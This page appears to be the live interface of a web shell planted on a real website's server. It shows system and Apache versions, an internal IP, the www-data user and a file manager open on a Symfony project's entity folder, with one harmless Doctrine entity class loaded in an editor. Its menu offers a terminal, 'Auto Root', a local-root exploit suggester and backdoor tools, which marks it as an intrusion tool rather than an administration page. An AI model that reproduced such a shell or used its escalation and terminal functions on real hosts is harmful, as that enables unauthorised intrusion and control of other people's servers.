Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
EventBundle /
Entity /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
MarketingAttendee.php
17.83
KB
-rwxrwxr-x
2026-04-02 11:48
MarketingEvent.php
17.65
KB
-rwxrwxr-x
2026-04-02 11:48
Questionnaire.php
9.18
KB
-rwxrwxr-x
2026-04-02 11:48
SchoolAttendee.php
19.49
KB
-rwxrwxr-x
2026-04-02 11:48
SchoolCostPackage.php
1.96
KB
-rwxrwxr-x
2026-05-25 12:28
SchoolCourse.php
13.25
KB
-rwxrwxr-x
2026-04-02 11:48
SchoolEvent.php
18.78
KB
-rwxrwxr-x
2026-04-02 11:48
SchoolFacilitator.php
3.44
KB
-rwxrwxr-x
2026-05-25 12:28
SchoolProvider.php
7.66
KB
-rwxrwxr-x
2026-04-02 11:48
SchoolWebCategory.php
3.37
KB
-rwxrwxr-x
2026-05-25 12:28
TrainingProvider.php
20.25
KB
-rwxrwxr-x
2026-04-02 11:48
Save
Rename
<?php namespace App\EventBundle\Entity; use Doctrine\Common\Collections\ArrayCollection; use Doctrine\Common\Collections\Collection; use Doctrine\ORM\Mapping as ORM; /** * SchoolCostPackage * * @ORM\Table(name="SchoolCostPackages") * @ORM\Entity(repositoryClass="App\EventBundle\Repository\SchoolCostPackageRepository") */ class SchoolCostPackage { /** * @ORM\Id * @ORM\Column(name="CostPackageID", type="integer") * @ORM\GeneratedValue(strategy="IDENTITY") */ private $id; /** * @ORM\Column(name="PackageName", type="string", length=255, nullable=true) */ private $package_name; /** * @ORM\OneToMany(targetEntity="SchoolEvent", mappedBy="school_cost_package") */ private $school_event; public function __construct() { $this->school_event = new ArrayCollection(); } public function getId(): ?int { return $this->id; } public function getPackageName(): ?string { return $this->package_name; } public function setPackageName(?string $package_name): static { $this->package_name = $package_name; return $this; } /** * @return Collection<int, SchoolEvent> */ public function getSchoolEvent(): Collection { return $this->school_event; } public function addSchoolEvent(SchoolEvent $schoolEvent): static { if (!$this->school_event->contains($schoolEvent)) { $this->school_event->add($schoolEvent); $schoolEvent->setSchoolCostPackage($this); } return $this; } public function removeSchoolEvent(SchoolEvent $schoolEvent): static { if ($this->school_event->removeElement($schoolEvent)) { // set the owning side to null (unless already changed) if ($schoolEvent->getSchoolCostPackage() === $this) { $schoolEvent->setSchoolCostPackage(null); } } return $this; } }